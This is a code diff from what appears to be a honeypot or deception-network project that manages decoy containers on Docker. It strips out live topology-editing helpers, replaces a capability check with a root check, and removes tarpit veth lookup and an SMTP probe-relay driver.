    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
    """Stop and remove one decky's containers, then re-render compose.

    Runs ``compose stop`` followed by ``compose rm -f`` on the decky's
    targets (base + per-decky services), each in a worker thread. A
    failure of either command is logged as a warning and does not stop
    the next step. Does nothing when the topology isn't eligible for live
    materialisation.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)

    # Both commands run BEFORE the compose file is re-rendered: the
    # re-rendered file no longer mentions the decky, so running them
    # afterwards would find no service to act on.
    steps = (
        (
            ("stop",),
            "live remove_decky: compose stop failed topology=%s decky=%s: %s",
        ),
        (
            ("rm", "-f"),
            "live remove_decky: compose rm failed topology=%s decky=%s: %s",
        ),
    )
    for argv, failure_msg in steps:
        try:
            await anyio.to_thread.run_sync(
                lambda argv=argv: _compose(*argv, *targets, compose_file=compose_path),
            )
        except Exception as exc:  # noqa: BLE001
            _log.warning(failure_msg, topology_id, decky_name, exc)

    await _rerender_compose(repo, topology_id)
|
||||
|
||||
|
||||
async def _materialise_decky_connect(
    repo: Any, topology_id: str,
    decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
    """SDK ``network.connect`` to multi-home a running base container.

    Service containers share the base's netns via ``network_mode:
    service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
    the base alone gives every service container the new interface for
    free — we don't need to iterate.

    Does nothing when the topology isn't eligible for live
    materialisation. Docker failures are logged, never re-raised; an
    ``APIError`` indicating the container is already attached is treated
    as success (logged at INFO). The compose file is re-rendered
    afterwards whether or not the connect succeeded.

    Args:
        repo: repository object passed on to the eligibility check and
            the compose re-render.
        topology_id: id of the topology being edited.
        decky_name: decky whose base container is attached.
        lan_name: LAN whose docker network the container joins.
        ipv4_address: address passed to the SDK ``connect`` call.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return
    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.connect(container, ipv4_address=ipv4_address)
    except docker.errors.APIError as exc:
        # Idempotency — already on the network is fine.
        msg = str(exc).lower()
        # Parenthesised to make the intended grouping explicit (this is
        # how Python already evaluated the unparenthesised form).
        already_attached = "already" in msg or ("endpoint" in msg and "exists" in msg)
        if already_attached:
            _log.info(
                "live attach_decky: %s already on network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        # One client is created per call; close it so its HTTP session
        # doesn't linger until garbage collection.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug("live attach_decky: docker client close failed: %s", exc)
    await _rerender_compose(repo, topology_id)
|
||||
|
||||
|
||||
async def _materialise_decky_disconnect(
    repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
    """SDK ``network.disconnect`` to drop a multi-home edge.

    Detaches the decky's base container from the LAN's docker network.
    Does nothing when the topology isn't eligible for live
    materialisation. Docker failures are logged, never re-raised; an
    ``APIError`` whose text contains "not connected" or "no such" is
    treated as "already detached" (logged at INFO). The compose file is
    re-rendered afterwards whether or not the disconnect succeeded.

    Args:
        repo: repository object passed on to the eligibility check and
            the compose re-render.
        topology_id: id of the topology being edited.
        decky_name: decky whose base container is detached.
        lan_name: LAN whose docker network the container leaves.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return
    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.disconnect(container)
    except docker.errors.APIError as exc:
        # Idempotency — already off the network (or gone) is fine.
        msg = str(exc).lower()
        if "not connected" in msg or "no such" in msg:
            _log.info(
                "live detach_decky: %s already off network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        # One client is created per call; close it so its HTTP session
        # doesn't linger until garbage collection.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug("live detach_decky: docker client close failed: %s", exc)
    await _rerender_compose(repo, topology_id)
|
||||
|
||||
|
||||
async def _materialise_decky_services_diff(
    repo: Any, topology_id: str,
    decky_name: str,
    added: list[str],
    removed: list[str],
) -> None:
    """Start newly added and tear down removed per-service containers of one decky.

    Sibling containers are left alone. The compose file is re-rendered
    first; then added services get ``compose up -d --no-deps --build``
    and removed services get ``compose stop`` followed by ``compose rm
    -f``. The decky's base container is never among the targets. Every
    compose failure is logged and swallowed.

    Returns immediately when both lists are empty or when the topology
    isn't eligible for live materialisation.

    Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
    without coupling the mutator to that module — service mutations
    routed via the mutator queue publish ``mutation.applied`` while the
    direct API publishes ``decky.<name>.service_added``; they share
    machinery, not control flow.
    """
    if not (added or removed):
        return
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)

    # _decky_targets always puts the base first; slice it off so only
    # service containers are touched.
    add_targets = _decky_targets(decky_name, list(added))[1:]
    if add_targets:
        try:
            await _compose_up_with_buildkit_fallback(
                "up", "-d", "--no-deps", "--build", *add_targets,
                compose_file=compose_path,
                label=f"live update_decky add topology={topology_id} decky={decky_name}",
            )
        except Exception as exc:  # noqa: BLE001
            _log.error(
                "live update_decky add: compose up failed topology=%s decky=%s: %s",
                topology_id, decky_name, exc,
            )

    rm_targets = _decky_targets(decky_name, list(removed))[1:]
    if rm_targets:
        teardown_steps = (("stop", ("stop",)), ("rm", ("rm", "-f")))
        for action_name, argv in teardown_steps:
            try:
                await anyio.to_thread.run_sync(
                    # argv is bound as a default so each step's closure
                    # keeps its own command.
                    lambda argv=argv: _compose(*argv, *rm_targets, compose_file=compose_path),  # type: ignore[misc]
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live update_decky %s failed topology=%s decky=%s: %s",
                    action_name, topology_id, decky_name, exc,
                )
|
||||
|
||||
|
||||
async def _materialise_decky_recreate_base(
    repo: Any, topology_id: str, decky_name: str,
) -> None:
    """Force-recreate only the decky's base container (used for forwards_l3 flips).

    Re-renders the compose file, then runs ``compose up -d --no-deps
    --force-recreate <decky_name>`` in a worker thread. A failure is
    logged as an error and swallowed. Does nothing when the topology
    isn't eligible for live materialisation.

    DESTRUCTIVE: kills any in-container state on the base. Service
    containers re-attach via ``network_mode: service:<base>`` after the
    base is rebuilt. This function performs no confirmation of its own —
    the caller is responsible for gating it on an explicit
    operator-supplied ``force=true`` flag.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import (
        _compose_with_retry, _topology_compose_path,
    )

    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)

    def _force_recreate():
        return _compose_with_retry(
            "up", "-d", "--no-deps", "--force-recreate", decky_name,
            compose_file=compose_path,
        )

    try:
        await anyio.to_thread.run_sync(_force_recreate)
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live update_decky recreate_base failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
|
||||
|
||||
|
||||
# ------------------------------------------------------------------- ops
|
||||
|
||||
|
||||
@@ -588,16 +131,6 @@ async def apply_add_lan(
|
||||
"y": payload.get("y"),
|
||||
}
|
||||
)
|
||||
|
||||
# Live materialisation: when the topology is active/degraded, create
|
||||
# the docker bridge network now and re-render the per-topology
|
||||
# compose file so subsequent ``apply_add_decky`` writes a coherent
|
||||
# services map. Pending topologies skip this — the next deploy
|
||||
# creates everything from scratch. Agent-pinned topologies also
|
||||
# skip; live editing on agents is its own routing problem.
|
||||
await _materialise_lan_change(
|
||||
repo, topology_id, created=(name, subnet, is_dmz),
|
||||
)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -617,17 +150,7 @@ async def apply_remove_lan(
|
||||
f"LAN {lan['name']!r} is the home LAN of decky "
|
||||
f"{d['decky_config']['name']!r}; remove the decky first"
|
||||
)
|
||||
lan_name = lan["name"]
|
||||
# enforce_pending=False: the mutator queue is the live-editing
|
||||
# surface, gated on topology status by us before we got here. The
|
||||
# repo's pending-only guard is for HTTP CRUD callers that mustn't
|
||||
# bypass it.
|
||||
await repo.delete_lan(lan["id"], enforce_pending=False)
|
||||
|
||||
# Live materialisation symmetric to apply_add_lan: tear down the
|
||||
# docker bridge and re-render compose so a future redeploy doesn't
|
||||
# try to wire deckies into a network that no longer exists.
|
||||
await _materialise_lan_change(repo, topology_id, removed=lan_name)
|
||||
await repo.delete_lan(lan["id"])
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -681,12 +204,11 @@ async def apply_add_decky(
|
||||
if forwards_l3:
|
||||
decky_config["forwards_l3"] = True
|
||||
|
||||
services_list = list(payload.get("services", []))
|
||||
decky_uuid = await repo.add_topology_decky(
|
||||
{
|
||||
"topology_id": topology_id,
|
||||
"name": name,
|
||||
"services": services_list,
|
||||
"services": list(payload.get("services", [])),
|
||||
"decky_config": decky_config,
|
||||
"x": payload.get("x"),
|
||||
"y": payload.get("y"),
|
||||
@@ -701,25 +223,6 @@ async def apply_add_decky(
|
||||
"forwards_l3": forwards_l3,
|
||||
}
|
||||
)
|
||||
# Live materialisation: spawn the new decky's containers without
|
||||
# touching siblings. Skips on pending / agent-pinned topologies —
|
||||
# see _live_topology_or_none.
|
||||
spawned = await _materialise_decky_spawn(
|
||||
repo, topology_id, name, services_list,
|
||||
)
|
||||
# Flip the row's state to 'running' on success so the dashboard's
|
||||
# ACTIVE DECKIES count reflects reality. Without this the row
|
||||
# stays at the default 'pending' forever; the deployer's full
|
||||
# post-deploy reconcile only runs on a fresh deploy_topology.
|
||||
if spawned:
|
||||
try:
|
||||
await repo.update_topology_decky(decky_uuid, {"state": "running"})
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live add_decky: state flip to running failed "
|
||||
"topology=%s decky=%s: %s",
|
||||
topology_id, name, exc,
|
||||
)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -783,16 +286,6 @@ async def apply_attach_decky(
|
||||
"forwards_l3": forwards_l3,
|
||||
}
|
||||
)
|
||||
# Live materialisation: SDK network.connect on the base container.
|
||||
# Service containers share the base's netns via network_mode:
|
||||
# service:<base>, so they inherit the new interface — only the base
|
||||
# needs the connect.
|
||||
await _materialise_decky_connect(
|
||||
repo, topology_id,
|
||||
decky_name=decky["decky_config"]["name"],
|
||||
lan_name=lan["name"],
|
||||
ipv4_address=ip,
|
||||
)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -836,15 +329,7 @@ async def apply_detach_decky(
|
||||
await repo.update_topology_decky(
|
||||
decky["uuid"], {"decky_config": new_cfg}
|
||||
)
|
||||
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
|
||||
# Live materialisation: SDK network.disconnect on the base
|
||||
# container. Service containers automatically lose visibility into
|
||||
# the LAN because they share the base's netns.
|
||||
await _materialise_decky_disconnect(
|
||||
repo, topology_id,
|
||||
decky_name=decky["decky_config"]["name"],
|
||||
lan_name=lan["name"],
|
||||
)
|
||||
await repo.delete_topology_edge(edge["id"])
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -855,15 +340,7 @@ async def apply_remove_decky(
|
||||
decky = _decky_by_name(hydrated, payload["decky"])
|
||||
if decky is None:
|
||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||
decky_name = decky["decky_config"]["name"]
|
||||
services_list = list(decky.get("services") or [])
|
||||
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
|
||||
# Live materialisation: stop + rm -f the decky's containers. We
|
||||
# capture decky_name + services BEFORE the delete so the helper
|
||||
# has the targets even though the row is gone.
|
||||
await _materialise_decky_remove(
|
||||
repo, topology_id, decky_name, services_list,
|
||||
)
|
||||
await repo.delete_topology_decky(decky["uuid"])
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -877,136 +354,31 @@ async def apply_update_decky(
|
||||
``patch`` — dict merged into existing ``decky_config``.
|
||||
``services`` — replacement top-level services list.
|
||||
``x``,``y`` — layout coords.
|
||||
``force`` — opt-in for destructive recreates (currently
|
||||
required when ``forwards_l3`` flips on a
|
||||
live topology — see below).
|
||||
|
||||
Live materialisation strategy:
|
||||
|
||||
* **services changed** → diff old vs new; ``compose up -d`` for
|
||||
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
|
||||
direct API path (services_live) without coupling.
|
||||
* **forwards_l3 flipped** → port publishing changes, which docker
|
||||
can only apply at container-create time. Requires recreating
|
||||
the base — destructive (kills in-container state, drops active
|
||||
sessions). Gated on ``payload['force'] is True``; otherwise we
|
||||
raise ``MutationError`` so a half-thinking operator doesn't
|
||||
stomp a live decky.
|
||||
* **only coords (x/y)** → DB-only. No docker work.
|
||||
"""
|
||||
hydrated = await _hydrated(repo, topology_id)
|
||||
decky = _decky_by_name(hydrated, payload["decky"])
|
||||
if decky is None:
|
||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||
|
||||
# Capture pre-state so we can compute the diff after the DB write.
|
||||
old_services = list(decky.get("services") or [])
|
||||
old_cfg = decky.get("decky_config") or {}
|
||||
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
|
||||
|
||||
patch: dict[str, Any] = {}
|
||||
new_decky_config = old_cfg
|
||||
if payload.get("patch"):
|
||||
new_decky_config = {**old_cfg, **payload["patch"]}
|
||||
patch["decky_config"] = new_decky_config
|
||||
new_services = old_services
|
||||
merged = dict(decky["decky_config"])
|
||||
merged.update(payload["patch"])
|
||||
patch["decky_config"] = merged
|
||||
if "services" in payload:
|
||||
new_services = list(payload["services"])
|
||||
patch["services"] = new_services
|
||||
patch["services"] = list(payload["services"])
|
||||
for key in ("x", "y"):
|
||||
if key in payload:
|
||||
patch[key] = payload[key]
|
||||
if not patch:
|
||||
return
|
||||
|
||||
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
|
||||
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
|
||||
|
||||
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
|
||||
# 'gateway' semantic specifically means 'host-port publisher facing
|
||||
# the DMZ' — running it on an internal LAN publishes ports the
|
||||
# outside world can't reach and shadows the host's port space.
|
||||
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
|
||||
# the generator/attach paths, not by this op, so this check only
|
||||
# fires when the operator explicitly toggles the flag.
|
||||
if forwards_l3_flipped and new_forwards_l3:
|
||||
# Re-derive the home LAN from the edges; same logic as
|
||||
# check_gateway_homed_in_dmz.
|
||||
decky_uuid = decky["uuid"]
|
||||
home_lan_id: Optional[str] = None
|
||||
for e in hydrated["edges"]:
|
||||
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
|
||||
home_lan_id = e["lan_id"]
|
||||
break
|
||||
if home_lan_id is None:
|
||||
for e in hydrated["edges"]:
|
||||
if e["decky_uuid"] == decky_uuid:
|
||||
home_lan_id = e["lan_id"]
|
||||
break
|
||||
home_lan = next(
|
||||
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
|
||||
None,
|
||||
)
|
||||
if home_lan is None or not home_lan.get("is_dmz"):
|
||||
home_name = home_lan["name"] if home_lan else "(unknown)"
|
||||
raise MutationError(
|
||||
f"cannot promote decky {decky['decky_config']['name']!r} "
|
||||
f"to gateway: home LAN {home_name!r} is not a DMZ. "
|
||||
"Move the decky to the DMZ first, or pick a different decky."
|
||||
)
|
||||
|
||||
# Pre-check the destructive flip BEFORE any DB write, so a refused
|
||||
# mutation leaves zero side-effects.
|
||||
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
|
||||
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
|
||||
raise MutationError(
|
||||
f"forwards_l3 flip on live decky "
|
||||
f"{decky['decky_config']['name']!r} requires force=true; "
|
||||
"this will recreate the base container and drop in-container state"
|
||||
)
|
||||
|
||||
await repo.update_topology_decky(decky["uuid"], patch)
|
||||
|
||||
# Materialisation — only when the topology is actually live.
|
||||
# _live_topology_or_none was already called above; calling the
|
||||
# individual helpers re-checks (cheap) so they stay self-contained.
|
||||
decky_name = decky["decky_config"]["name"]
|
||||
added = sorted(set(new_services) - set(old_services))
|
||||
removed = sorted(set(old_services) - set(new_services))
|
||||
if added or removed:
|
||||
await _materialise_decky_services_diff(
|
||||
repo, topology_id, decky_name, added, removed,
|
||||
)
|
||||
if forwards_l3_flipped:
|
||||
# force was checked above; reaching here means the operator
|
||||
# opted in. recreate_base re-renders compose first so the
|
||||
# rebuilt base picks up the new `ports:` block.
|
||||
await _materialise_decky_recreate_base(
|
||||
repo, topology_id, decky_name,
|
||||
)
|
||||
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
async def apply_update_lan(
|
||||
repo: Any, topology_id: str, payload: dict[str, Any]
|
||||
) -> None:
|
||||
"""Update LAN fields — subnet, is_dmz, coords, rename.
|
||||
|
||||
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
|
||||
Live deckies bind to the bridge with IPs allocated from the old
|
||||
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
|
||||
flag, which docker can't change on a network with active
|
||||
containers). Reject those mutations on active/degraded topologies
|
||||
rather than rewriting the DB into an incoherent state.
|
||||
|
||||
Coord-only updates (``x``/``y``) are layout-only; let them through
|
||||
unconditionally. Renames pass through too — the bridge's docker
|
||||
name is keyed off ``_network_name(topology_id, lan_name)``, so a
|
||||
rename would also need a rebuild — but rename isn't currently a
|
||||
code path on active topologies; if the operator hits it we still
|
||||
write the row and let the next deploy reconcile.
|
||||
"""
|
||||
"""Update LAN fields — subnet, is_dmz, coords, rename."""
|
||||
hydrated = await _hydrated(repo, topology_id)
|
||||
lan = _lan_by_name(hydrated, payload["name"])
|
||||
if lan is None:
|
||||
@@ -1017,17 +389,6 @@ async def apply_update_lan(
|
||||
fields[key] = payload[key]
|
||||
if not fields:
|
||||
return
|
||||
|
||||
topology = await repo.get_topology(topology_id)
|
||||
is_live = bool(topology) and topology.status in ("active", "degraded")
|
||||
if is_live:
|
||||
hostile = {"subnet", "is_dmz"} & fields.keys()
|
||||
if hostile:
|
||||
raise MutationError(
|
||||
f"cannot change {sorted(hostile)} on a deployed LAN; "
|
||||
f"teardown + redeploy required"
|
||||
)
|
||||
|
||||
await repo.update_lan(lan["id"], fields)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -151,20 +151,11 @@ def _ensure_network(
|
||||
options.update(extra_options)
|
||||
|
||||
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
|
||||
# networks.list() doesn't populate Containers — reload to get the
|
||||
# full inspect payload (including connected container IDs).
|
||||
try:
|
||||
net.reload()
|
||||
except docker.errors.APIError:
|
||||
pass
|
||||
|
||||
if net.attrs.get("Driver") == driver:
|
||||
# Same driver — but if the IPAM pool drifted (different subnet,
|
||||
# gateway, or ip-range than this deploy asks for), reusing it
|
||||
# hands out addresses from the old pool and we race the real LAN.
|
||||
# Compare and rebuild on mismatch — but only when no containers
|
||||
# are attached. With active endpoints Docker refuses the remove
|
||||
# with 403; just attach to the existing network instead.
|
||||
# Compare and rebuild on mismatch.
|
||||
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
|
||||
cur = pools[0] if pools else {}
|
||||
if (
|
||||
@@ -173,15 +164,8 @@ def _ensure_network(
|
||||
and cur.get("IPRange") == ip_range
|
||||
):
|
||||
return # right driver AND matching pool, leave it alone
|
||||
if net.attrs.get("Containers"):
|
||||
# Active endpoints — can't safely rebuild. Attach to the
|
||||
# existing network; IPAM drift on ip_range only affects
|
||||
# Docker's auto-assign pool, which DECNET doesn't use
|
||||
# (IPs are always set explicitly in the compose file).
|
||||
return
|
||||
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
|
||||
# Disconnect any live containers first so `remove()` doesn't
|
||||
# refuse with ErrNetworkInUse.
|
||||
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live
|
||||
# containers first so `remove()` doesn't refuse with ErrNetworkInUse.
|
||||
for cid in (net.attrs.get("Containers") or {}):
|
||||
try:
|
||||
net.disconnect(cid, force=True)
|
||||
@@ -319,44 +303,11 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
|
||||
# Host-side macvlan interface (hairpin fix)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
# Linux capability bit positions — see capabilities(7).
_CAP_NET_ADMIN = 12


def _has_cap_net_admin() -> bool:
    """Tell whether this process holds CAP_NET_ADMIN in its effective set.

    The answer comes from the ``CapEff:`` line of ``/proc/self/status``
    (a hex bitmask; bit ``_CAP_NET_ADMIN`` is tested) rather than from
    ``capget(2)``, so no libcap dependency is needed.

    Returns False when the file can't be opened or read (``OSError``) or
    when it has no ``CapEff:`` line.
    """
    try:
        with open("/proc/self/status", "r") as status_file:
            cap_eff_line = next(
                (entry for entry in status_file if entry.startswith("CapEff:")),
                None,
            )
            if cap_eff_line is not None:
                effective_mask = int(cap_eff_line.split()[1], 16)
                return bool(effective_mask & (1 << _CAP_NET_ADMIN))
    except OSError:
        pass
    return False
|
||||
|
||||
|
||||
def _require_net_admin() -> None:
    """Reject early if the process can't run ``ip link add ... macvlan``.

    CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
    of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
    but not necessary.  Prefer the cap check so the systemd unit's
    ``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
    whole API to run as root.

    Raises:
        PermissionError: the process is neither root nor holds
            CAP_NET_ADMIN in its effective capability set.
    """
    if os.geteuid() == 0 or _has_cap_net_admin():
        return
    raise PermissionError(
        "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
        "Either run as root or grant the cap (systemd: "
        "AmbientCapabilities=CAP_NET_ADMIN)."
    )
|
||||
def _require_root() -> None:
|
||||
if os.geteuid() != 0:
|
||||
raise PermissionError(
|
||||
"MACVLAN host-side interface setup requires root. Run with sudo."
|
||||
)
|
||||
|
||||
|
||||
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
||||
@@ -366,9 +317,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
||||
host-helper first: the two drivers can share a parent NIC on paper but
|
||||
leaving the opposite helper in place is just cruft after a driver swap.
|
||||
"""
|
||||
_require_net_admin()
|
||||
|
||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||
_require_root()
|
||||
|
||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||
|
||||
@@ -383,7 +332,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
||||
|
||||
|
||||
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
||||
_require_net_admin()
|
||||
_require_root()
|
||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||
|
||||
@@ -395,9 +344,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
||||
host-helper first so a prior macvlan deploy doesn't leave its slave
|
||||
dangling on the parent NIC after the driver swap.
|
||||
"""
|
||||
_require_net_admin()
|
||||
|
||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||
_require_root()
|
||||
|
||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||
|
||||
@@ -411,7 +358,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
||||
|
||||
|
||||
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
||||
_require_net_admin()
|
||||
_require_root()
|
||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||
|
||||
@@ -431,47 +378,3 @@ def ips_to_range(ips: list[str]) -> str:
|
||||
strict=False,
|
||||
)
|
||||
return str(network)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Container veth resolution (for tc netem tarpit)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def get_container_pid(container_name: str) -> int:
    """Return the PID of a running container's init process.

    Args:
        container_name: Name (or id) passed to ``client.containers.get``.

    Returns:
        The ``State.Pid`` value reported in the container's attributes.

    Raises:
        LookupError: the container does not exist, or it exists but
            reports PID 0 (i.e. it is not running).
    """
    client = docker.from_env()
    try:
        container = client.containers.get(container_name)
        pid = container.attrs["State"]["Pid"]
    except docker.errors.NotFound as exc:
        # Chain explicitly so the Docker-side error stays visible as the cause.
        raise LookupError(f"container {container_name!r} not found") from exc
    finally:
        # A fresh client is created per call; release its connection pool.
        client.close()
    if not pid:
        raise LookupError(f"container {container_name!r} is not running (PID=0)")
    return pid
|
||||
|
||||
|
||||
def get_container_veth(container_name: str) -> str:
    """Return the host veth interface name paired to container_name's eth0.

    Reads /sys/class/net/eth0/iflink from inside the container to get the
    peer interface index, then matches it against ``ip link show`` on the host.
    Requires no nsenter and no elevated privileges beyond what Docker exec grants.

    Raises:
        LookupError: ``docker exec`` failed, the iflink value is not a
            plain integer, or no host interface carries that index.
    """
    result = _run(
        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
        check=False,
    )
    if result.returncode != 0:
        raise LookupError(
            f"container {container_name!r} not reachable: {result.stderr.strip()}"
        )

    peer_index = result.stdout.strip()
    if not peer_index.isdigit():
        # Empty or garbage output could never match a line below; fail with
        # a message that names the real problem instead.
        raise LookupError(
            f"container {container_name!r} returned unexpected iflink value {peer_index!r}"
        )

    prefix = f"{peer_index}:"
    links = _run(["ip", "link", "show"])
    for line in links.stdout.splitlines():
        if line.startswith(prefix):
            # Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
            return line.split(":")[1].strip().split("@")[0]
    raise LookupError(
        f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
    )
|
||||
|
||||
@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
|
||||
try:
|
||||
from decnet.orchestrator.emailgen.scheduler import EmailAction
|
||||
except ImportError: # pragma: no cover - scheduler always exists
|
||||
EmailAction = None # type: ignore[assignment, misc]
|
||||
EmailAction = None # type: ignore[assignment]
|
||||
if EmailAction is not None and isinstance(action, EmailAction):
|
||||
from decnet.orchestrator.drivers.email import EmailDriver
|
||||
return EmailDriver()
|
||||
|
||||
@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
|
||||
"""Convenience accessor for telemetry / logging."""
|
||||
return self._llm.model
|
||||
|
||||
async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
|
||||
async def run(self, action: EmailAction) -> ActivityResult:
|
||||
return await self._run_email(action)
|
||||
|
||||
async def _run_email(self, action: EmailAction) -> ActivityResult:
|
||||
|
||||
@@ -1,80 +0,0 @@
|
||||
"""SMTP probe-relay driver.
|
||||
|
||||
Forwards the attacker's first probe email via the master's real internet
|
||||
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
|
||||
the master (where this worker runs) does.
|
||||
|
||||
Called by the realism worker's smtp probe listener, not the main tick loop.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import email
|
||||
import smtplib
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
|
||||
|
||||
|
||||
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
|
||||
"""Return body with a From: header added if one is absent."""
|
||||
try:
|
||||
msg = email.message_from_bytes(body)
|
||||
except Exception:
|
||||
return body
|
||||
if msg["From"]:
|
||||
return body
|
||||
# Prepend the header before the existing content.
|
||||
header_line = f"From: {mail_from}\r\n".encode()
|
||||
return header_line + body
|
||||
|
||||
|
||||
def forward_probe(
    *,
    svc_cfg: dict[str, Any],
    stored_as: str,
    decky_name: str,
    mail_from: str,
    rcpt_to: list[str],
    artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
    """Read the .eml from disk and forward it via the upstream relay.

    Args:
        svc_cfg: Service configuration; reads ``upstream_host``,
            ``upstream_port`` (default 25), ``upstream_user``,
            ``upstream_pass`` and ``upstream_sender``.
        stored_as: File name of the stored message under
            ``<artifacts_root>/<decky_name>/smtp/``.
        decky_name: Directory name of the decky that captured the message.
        mail_from: Envelope sender of the captured message; used as the
            envelope sender when ``upstream_sender`` is empty.
        rcpt_to: Envelope recipients.
        artifacts_root: Root directory holding per-decky artifacts.

    Returns:
        (True, "") on success or (False, reason) on failure.
